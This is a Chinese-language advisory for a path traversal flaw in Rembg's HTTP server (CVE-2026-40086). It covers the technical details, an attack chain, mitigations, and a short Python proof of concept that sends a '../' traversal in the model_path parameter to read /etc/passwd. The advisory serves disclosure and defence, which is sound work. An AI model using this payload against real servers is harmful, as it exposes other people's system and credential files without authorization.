CVE-2026-40086 CVSS 5.3 中危

CVE-2026-40086 Rembg路径遍历漏洞

披露日期: 2026-04-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40086

漏洞类型

路径遍历

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Rembg

漏洞概述

Rembg 是一个用于去除图像背景的工具。在 2.0.75 版本之前，其 HTTP 服务器组件中存在路径遍历漏洞。未经身份认证的远程攻击者可以通过发送包含恶意 model_path 参数的特制请求，读取服务器文件系统上的任意文件。该漏洞可能导致敏感信息泄露，包括文件存在性及部分文件内容。厂商已在 2.0.75 版本中修复了此问题。

技术细节

该漏洞源于 Rembg HTTP 服务器在处理模型加载请求时，未对用户输入的 model_path 参数进行严格的路径安全校验与规范化。攻击者可以通过构造包含目录遍历字符（如 ../）的恶意请求，绕过预期的目录限制，强制服务器加载文件系统中的任意文件。当服务器试图将非 ONNX 格式的文件解析为模型时，解析过程失败并在错误消息中返回详细信息。这些错误信息可能包含文件的具体内容片段、文件是否存在以及文件权限等上下文数据，从而造成信息泄露。由于不需要用户交互和身份认证，该漏洞容易被自动化工具扫描利用。修复版 2.0.75 通过路径规范化解决了此问题。

攻击链分析

STEP 1

侦察

攻击者识别互联网上运行 Rembg HTTP 服务的目标。

STEP 2

构造恶意请求

攻击者构造 HTTP POST 请求，在 model_path 参数中插入路径遍历序列（如 ../../），指向敏感文件（如 /etc/passwd）。

STEP 3

发送请求

将恶意请求发送至目标服务器，无需进行身份验证。

STEP 4

解析响应

服务器尝试加载文件失败并返回错误信息，攻击者从响应中提取文件内容片段或确认文件存在性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_rembg(target_url):
    """
    PoC for CVE-2026-40086
    Attempts to read a file using path traversal via model_path.
    """
    # The endpoint might vary depending on server configuration
    endpoint = f"{target_url}/remove" 
    
    # Path traversal payload to read /etc/passwd (Linux) or win.ini (Windows)
    # Adjust the number of '../' based on the deployment depth
    payload = {
        "model_path": "../../../../../../etc/passwd"
    }

    try:
        response = requests.post(endpoint, data=payload)
        
        # The error message often reveals the file content or existence
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Request sent successfully.")
            print("[+] Response (Check for file content/errors):")
            print(response.text[:500]) 
    except Exception as e:
        print(f"[-] Error during request: {e}")

if __name__ == "__main__":
    target = "http://localhost:5000" # Replace with actual target
    exploit_rembg(target)

影响范围

Rembg < 2.0.75

防御指南

临时缓解措施

若无法立即升级，建议在防火墙或反向代理（如 Nginx）上配置规则，拦截包含路径遍历特征（如 '../' 或 '%2e%2e/'）的请求参数。同时，确保运行 Rembg 的服务账户仅具有访问必要模型文件的权限，避免读取系统敏感文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表